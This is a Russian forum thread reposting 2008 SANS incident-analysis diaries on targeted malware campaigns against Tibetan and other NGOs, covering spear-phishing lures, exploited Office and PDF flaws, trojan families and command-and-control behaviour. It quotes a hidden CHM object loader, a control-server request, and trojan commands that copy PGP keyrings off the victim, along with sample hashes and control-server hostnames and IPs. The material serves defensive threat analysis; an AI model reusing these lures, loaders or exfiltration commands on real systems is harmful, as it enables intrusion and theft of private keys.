Перейти к содержанию

Небольшой экскурс в Чайна-таун (с продолжением)


Loo

Рекомендуемые сообщения

Вообще я не знаю, чего тут скрывать, но файлик с презенташкой этой постоянно отовсюду трут. Ревью атак китайцев и методология защиты Китайских сетей

China_Cyber___Fair_Use_1_.pdf

Ссылка на комментарий
Поделиться на другие сайты

  • 2 недели спустя...

еще информация

_ttp://isc.sans.org/diary.html?n&storyid=4177

Cyber attacks against Tibetan communities

Published: 2008-03-21,

Last Updated: 2008-03-22 12:26:51 UTC

by Maarten Van Horenbeeck (Version: 4)

There is lots of media coverage on the protests in Tibet. Something that lies under the surface, and rarely gets a blip in the press, are the various targeted cyber attacks that have been taking place against these various communities recently.

 

These attacks are not limited to various Tibetan NGOs and support groups. They have been reported dating back to 2002, and even somewhat before that, and have affected several other communities, including Falun Gong and the Uyghurs.

 

The attacks generally start with a very trustworthy looking e-mail, being spoofed as originating from a known contact, to someone within a community. Some impressive social engineering tricks are used:

 

Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' is invoked between the reader's pre-existent beliefs and the statement. There's a natural urge to click on the attachment to confirm that belief;

The writing style of the purported sender is usually well researched to have the message look as believable as possible;

The content of the document actually matches closely what was discussed in the e-mail message;

Having legitimate, trusted, users actually forward along a message back into the community.

The messages contain an attachment which exploits a client side vulnerability. Generally these are:

 

CHM Help files with embedded objects;

Acrobat Reader PDF exploits;

Microsoft Office exploits;

LHA files exploiting vulnerabilities in WinRAR;

Exploitation of an ActiveX component through an attached HTML file.

Here's a sample attachment and its AV coverage at the time it was distributed:

 

reports_of_violence_in_tibet.ppt

MD5 977a4ac91acf5d88044a68f828154155

 

AhnLab-V3 2008.3.20.2 2008.03.20 -

AntiVir 7.6.0.75 2008.03.20 EXP/Office.Dropper.Gen

Authentium 4.93.8 2008.03.20 -

Avast 4.7.1098.0 2008.03.20 MPPT97:CVE-2006-3590

AVG 7.5.0.516 2008.03.20 -

BitDefender 7.2 2008.03.20 Exploit.PPT.Gen

CAT-QuickHeal 9.50 2008.03.20 -

ClamAV 0.92.1 2008.03.20 -

DrWeb 4.44.0.09170 2008.03.20 -

eSafe 7.0.15.0 2008.03.18 -

eTrust-Vet 31.3.5629 2008.03.20 -

Ewido 4.0 2008.03.20 -

F-Prot 4.4.2.54 2008.03.19 File is damaged

F-Secure 6.70.13260.0 2008.03.20 -

FileAdvisor 1 2008.03.20 -

Fortinet 3.14.0.0 2008.03.20 -

Ikarus T3.1.1.20 2008.03.20 -

Kaspersky 7.0.0.125 2008.03.20 -

McAfee 5256 2008.03.20 -

Microsoft 1.3301 2008.03.20 -

NOD32v2 2964 2008.03.20 PP97M/TrojanDropper.Agent.NAI

Norman 5.80.02 2008.03.20 -

Panda 9.0.0.4 2008.03.20 -

Prevx1 V2 2008.03.20 -

Rising 20.36.32.00 2008.03.20 -

Sophos 4.27.0 2008.03.20 -

Sunbelt 3.0.978.0 2008.03.18 -

Symantec 10 2008.03.20 -

TheHacker 6.2.92.250 2008.03.19 -

VBA32 3.12.6.3 2008.03.17 -

VirusBuster 4.3.26:9 2008.03.20 -

Webwasher-Gateway 6.6.2 2008.03.20 Exploit.Office.Dropper.Gen

 

As you can see, Anti virus is generally not proving effective against the samples distributed in this ongoing attack. We often see similar samples returning, only to have been edited slightly to prevent them from being picked up.

 

Most of the time, the samples then drop very raw trojans not restricted much in ability. This means that only investigating the trojan does not always reveal the data targeted. To investigate, it's necessary to find out which commands were submitted So far, we have uncovered attacks that specifically searched the file system for Word documents, e-mail contents and, most interestingly PGP keyrings.

 

If you’re interested in this, you may like to read Crouching Powerpoint, Hidden Trojan, a presentation I gave earlier in the year on similar attacks against Falun Gong. Brian Krebs at the Washington Post has also written on the unfolding events. Mikko at F-Secure, Sophos and McAfee AVERT also have very interesting blog postings up on the topic.

 

We've been working with several groups on these attacks since early 2007. If you or your organization has also been targeted, now or in the past, please get in touch. We will not publish any data on your specific attacks without your permission.

 

--

Ссылка на комментарий
Поделиться на другие сайты

и еще продолжение - http://isc.sans.org/diary.html?n&storyid=4177

 

This hopefully helps you identify the risk similar attacks would pose to your organization. The diary does not deal with one incident, but looks at overall findings.

1. The message

 

The sole goal of the message is to transport the exploit, and to convince the reader to click on it, so the malicious code can execute.

 

Several social engineering tricks have been seen:

 

* Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' arises between the reader's pre-existent beliefs and the statement. This urges the reader to click the message;

* The writing style of the purported sender is well researched and mimicked;

* The content of the document matches the topic of the e-mail message;

* Legitimate, trusted, users are sometimes convinced to actually forward along a message back to specific targets;

* In a number of cases, “memes” distributed within the community have been reused. For instance, in a “viral” Word document was grabbed from a forum, edited to include the exploit and Trojan code, and forwarded onto other members of the community.

 

Here’s a sample. This message was sent to someone very active within the Tibetan community, and was spoofed as originating from the Secretary of International Relations of the Central Tibetan Administration, the government in exile in Dharamshala, India. The name and contact details of the official were accurate:

 

All,

 

Attached here is the update Human Rights Report on Tibet issued by

Department of State of U.S.A on March 11, 2008.

 

You may also visit the site:

 

Tashi Deleg,

 

Sonam Dagpo

 

Secretary of International Relations

Department of Information & International Relations

Central Tibetan Administration

Dharamshala -176215

H.P., INDIA

Ph.: [obfuscated]

Fax: [obfuscated]

E-mail: [obfuscated]@gov.tibet.net or diir-pa@gov.tibet.net

Website: http://www.tibet.net/en/diir/

 

 

In some cases, messages were sent which addressed the recipient by his first name, and provided “clarification on a topic” which had previously been discussed between the sender and the recipient. While not evidence, there are specific instances in which it appears previously compromised accounts were re-used to engage in better social engineering.

2. The exploit

 

The messages contain an attachment which exploits a client side vulnerability. The most common vectors so far have been:

 

* CHM Help files with embedded objects;

* CVE-2008-0655: Acrobat Reader PDF exploit

* CVE-2006-2492, CVE-2007-3899: Word

* CVE-2006-3590, CVE-2006-0009: Powerpoint

* CVE-2008-0081: Excel

* CVE-2005-0944: Microsoft Access

* CVE-2006-3845: LHA files exploiting vulnerabilities in WinRAR.

 

The file exploits the vulnerability, and executes shellcode which generally unpacks at least two embedded components:

 

* The actual Trojan binary: Which can be packed (using UPX, Armadillo, FSG or PE-ARMOR), but in most cases is unpacked and easily retrievable from the file. It is described further in chapter 3 of this diary entry.

* A benign, non-malicious document of the same file type: upon successful execution of the exploit code, it generally “cleans up” and instead of showing an indication that the application has crashed, it drops a clean file to disk (be it either RAR, DOC, PPT or any of the other files affected) and opens it.

 

The second file shows context very valid to the message initially sent. An example image is included for reference below. This was grabbed from what was sent as a promotional flyer on a book on Tibet. In the background, it dropped a Trojan. Both the flyer and the book exist in real-life form, unbugged. This was an example of taking something which "exists" within the community, and republishing it with trojaned contents.

 

hese files usually have very low AV coverage. Below is sample Virustotal output for the malicious PDF sample:

 

China’s Tibet.pdf

MD5 70d0d15041a14adaff614f0b7bf8c428

 

AhnLab-V3 2008.3.22.1 2008.03.21 -

AntiVir 7.6.0.75 2008.03.21 -

Authentium 4.93.8 2008.03.20 -

Avast 4.7.1098.0 2008.03.21 -

AVG 7.5.0.516 2008.03.21 -

BitDefender 7.2 2008.03.21 -

CAT-QuickHeal 9.50 2008.03.20 -

ClamAV 0.92.1 2008.03.21 -

DrWeb 4.44.0.09170 2008.03.21 -

eSafe 7.0.15.0 2008.03.18 -

eTrust-Vet 31.3.5631 2008.03.21 -

Ewido 4.0 2008.03.21 -

F-Prot 4.4.2.54 2008.03.20 -

F-Secure 6.70.13260.0 2008.03.21 -

FileAdvisor 1 2008.03.21 -

Fortinet 3.14.0.0 2008.03.21 -

Ikarus T3.1.1.20 2008.03.21 -

Kaspersky 7.0.0.125 2008.03.21 -

McAfee 5257 2008.03.21 -

Microsoft 1.3301 2008.03.21 -

NOD32v2 2966 2008.03.21 -

Norman 5.80.02 2008.03.20 -

Panda 9.0.0.4 2008.03.21 -

Prevx1 V2 2008.03.21 -

Rising 20.36.42.00 2008.03.21 -

Sophos 4.27.0 2008.03.21 Mal/JSShell-B

Sunbelt 3.0.978.0 2008.03.18 -

Symantec 10 2008.03.21 -

TheHacker 6.2.92.250 2008.03.19 -

VBA32 3.12.6.3 2008.03.21 -

VirusBuster 4.3.26:9 2008.03.21 Exploit.PDF.A

Webwasher-Gateway 6.6.2 2008.03.21 Exploit.PDF.ZoneBac.gen (suspicious)

 

 

3. The backdoor

 

Upon successful exploitation, the dropper installs a Trojan. We have monitored over 8 different Trojan families in use. Quite common are Enfal, Riler and Protux. In addition, control over some machines is maintained using the Gh0st RAT remote access tool.

 

These trojans generally allow close to unrestricted access to the system under the user account which installed the Trojan. Many machines involved in this incident are home desktops, as such this is often the administrator account. The Backdoor generally triggers a few generic signatures, but has very low AV coverage at the time of distribution.

 

Below is a sample extracted from a malicious Excel document:

 

event_0310_result.exe

MD5 7d62cec8f022e9599885ad7d079d2f60

 

AhnLab-V3 2008.3.4.0/20080310 found nothing

AntiVir 7.6.0.73/20080310 found [HEUR/Malware]

Authentium 4.93.8/20080307 found nothing

Avast 4.7.1098.0/20080309 found nothing

AVG 7.5.0.516/20080310 found nothing

BitDefender 7.2/20080310 found nothing

CAT-QuickHeal 9.50/20080308 found nothing

ClamAV None/20080310 found nothing

DrWeb 4.44.0.09170/20080310 found nothing

eSafe 7.0.15.0/20080309 found nothing

eTrust-Vet 31.3.5597/20080307 found nothing

Ewido 4.0/20080310 found nothing

F-Prot 4.4.2.54/20080309 found nothing

F-Secure 6.70.13260.0/20080310 found [suspicious:W32/Malware!Gemini]

FileAdvisor 1/20080310 found nothing

Fortinet 3.14.0.0/20080310 found nothing

Ikarus T3.1.1.20/20080310 found nothing

Kaspersky 7.0.0.125/20080310 found nothing

McAfee 5247/20080307 found nothing

Microsoft 1.3301/20080310 found nothing

NOD32v2 2935/20080310 found nothing

Norman 5.80.02/20080307 found nothing

Panda 9.0.0.4/20080309 found nothing

Prevx1 V2/20080310 found [Heuristic: Suspicious Self Modifying File]

Rising 20.35.02.00/20080310 found nothing

Sophos 4.27.0/20080310 found [Mal/Behav-116]

Sunbelt 3.0.930.0/20080305 found nothing

Symantec 10/20080310 found nothing

TheHacker 6.2.92.239/20080309 found nothing

VBA32 3.12.6.2/20080305 found nothing

VirusBuster 4.3.26:9/20080309 found nothing

Webwasher-Gateway 6.6.2/20080310 found [Heuristic.Malware]

 

 

4. The control connection

 

In order for the Trojan to be effective, it needs to “phone home”. This usually (but not always) consists of two steps:

 

* A DNS lookup to acquire the address of the control server;

* The actual connection.

 

The DNS lookup occurs for a hostname embedded in the Trojan. So far, we have tracked over 50 unique hostnames. Some are used against a single organization or individual, others are used across the spectrum to many different targets.

 

Interestingly, attacks are “timed”. Let’s look at some DNS resolution logs:

 

+ 2008-03-22 06:05 | dns3.westcowboy.com | 210.162.89.242

- 2008-03-22 06:05 | dns3.westcowboy.com | 127.0.0.1

+ 2008-03-22 15:07 | dns3.westcowboy.com | 127.0.0.1

- 2008-03-22 15:07 | dns3.westcowboy.com | 210.162.89.242

+ 2008-03-23 07:18 | dns3.westcowboy.com | 210.162.89.242

- 2008-03-23 07:18 | dns3.westcowboy.com | 127.0.0.1

+ 2008-03-23 09:54 | dns3.westcowboy.com | 127.0.0.1

- 2008-03-23 09:54 | dns3.westcowboy.com | 210.162.89.242

 

When the hostname resolves to one of the above IP addresses, a connection is set up. When it resolves to 127.0.0.1 however, the compromised machine will no longer connects out.

 

As several IDS rules are available to trigger on lookups that result in 127.0.0.1, we are also seeing samples that contain a check for a specific ‘code’ IP. When the control server resolves to this address, the Trojan holds for a few minutes, then does another lookup. These “parking addresses” have included 43.44.43.44 and 63.64.63.64.

 

In the above example, this indicates that the team behind these attacks was busy gathering data from 06:05 till 15:07, only to start again almost exactly one day later, 07:18.

 

In a few cases, the control connection has been regular HTTP or HTTPS, set up using code injected into the Internet Explorer process. This allows the Trojan to be proxy-aware. In other instances, there have been control connections that were fully binary (such as Gh0st RAT) or encrypted using an obvious XOR key.

 

Some control connections can be detected on the network or proxy level, such as those of certain Riler and Enfal families:

 

When started, Enfal issues HTTP POST requests to the controller for:

 

/cgi-bin/Owpq4.cgi

/cgi-bin/Fupq9.cgi

 

The Riler Trojan family can also be identified through its connection protocol (bold is the infected client submitting data):

 

NAME:

NAME: [hostname].VER: Stealt h 2.6 MARK: fl510 OS: NT 5.0.L_IP: 10. 2.0.18.ID: NoID.

LONG:0501_LOG.txt

NULL

AUTO

ERR code = 02

SNIF

ERR code = 02

WAKE

WAKE

 

It also has a recognizable command set:

 

LOCK SEND WAKE NAME MOON KEEP DISK FILE

DONE DOWN LONG MAKE ATTR KILL LIKE SEEK

READ DEAD DDLL AUTO READY

 

 

5. The control server

 

The vast majority of control servers were identified on Chinese netblocks. However, servers have been identified in the USA, South Korea and Taiwan. The host names pointing to these servers are often configured on dynamic DNS services such as 3322.org. While these services in themselves are not malicious, they are heavily used in these specific attacks.

 

At the moment, it appears at least a number of the control servers have been compromised using open Terminal Services (RDP/3389) combined with weak passwords.

 

 

 

Based on the technical data, it is impossible to say who is the culprit in these attacks. What is however clear is that these NGOs are systematically hampered using malicious code, either with as goal to gain access to their communications, or to make them reluctant to use e-mail to begin with.

 

While this is not the full picture on the attacks, we hope this overview already proves useful, and please get in touch if you have questions or additional feedback.

 

Cheers,

 

Maarten Van Horenbeeck

Maarten at daemon.be

Ссылка на комментарий
Поделиться на другие сайты

а вот как воруют ключи PGP ;-)

 

_ttp://isc.sans.org/diary.html?n&storyid=4207

 

Guarding the guardians: a story of PGP key ring theft

Published: 2008-03-27,

Last Updated: 2008-03-27 09:07:04 UTC

by Maarten Van Horenbeeck (Version: 1)

0 comment(s)

 

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero. On Virustotal.com, two solutions actually flagged it as malicious.

 

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

 

object width="0" height="0" style="display:none;"

type="application/x-oleobject" codebase="music.exe"

 

The goal of this code is to load a hidden object from the CHM container. This embedded file also was not recognized by the vast majority of anti virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

 

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

 

When you see something like this, it raises suspicion that the UID is in fact a ‘command’ to a control server. In reality, the web server turned out not a web server at all. Any query but the above was answered with an immediate disconnect. In response to the above request, the server responded with a large BASE64 encoded response, which turned out to be an additional executable file. The trojan then executed this file, being its second stage payload.

 

This file subsequently connected to a second server, being the actual control server. It sent an identical registration URI as above to this machine. In return, the server responded with another BASE64 encoded string. This was much shorter, and once decoded, turned out to be:

 

<Command Begin>

netmgetr usb:\*.doc

netmgetr usb:\*.pkr

netmgetr usb:\*.skr

netlsr usb:\*.*

<Command End>

 

Upon further review of the trojan code, netmgetr scanned the file system for a filename and then copies it from the system. This is interesting, because reports of malware looking for PGP keyrings (the .skr and .pkr files in the above example) are rare. There have been instances, such as the ’99 Caligula macro-virus, but this was more proof-of-concept code.

 

In this case, the code above was combined with a keylogger, so the passphrase could have been grabbed as well. However, we did not see this happening. It appears the attacker's goal was to ”map” who was talking to whom encrypted. In this attack, the latter information appears to have been actively used to send malware to other people in a more convincing way.

 

There are two things we can learn from this:

 

* It’s clear that we should understand that the network that houses our data is not just a network of machines. It’s a network of people. Knowing who talks to whom and how is valuable help for an attacker in selecting his next targets, and making them look "normal";

* When we use strong encryption, attackers will not try to "break" that encryption. They will move to the endpoints to steal the keys that are used to encrypt it. Ensure sufficient security is implemented on key storage.

 

Cheers,

 

Maarten Van Horenbeeck

maarten at daemon.be

Ссылка на комментарий
Поделиться на другие сайты

Заархивировано

Эта тема находится в архиве и закрыта для дальнейших ответов.

×
×
  • Создать...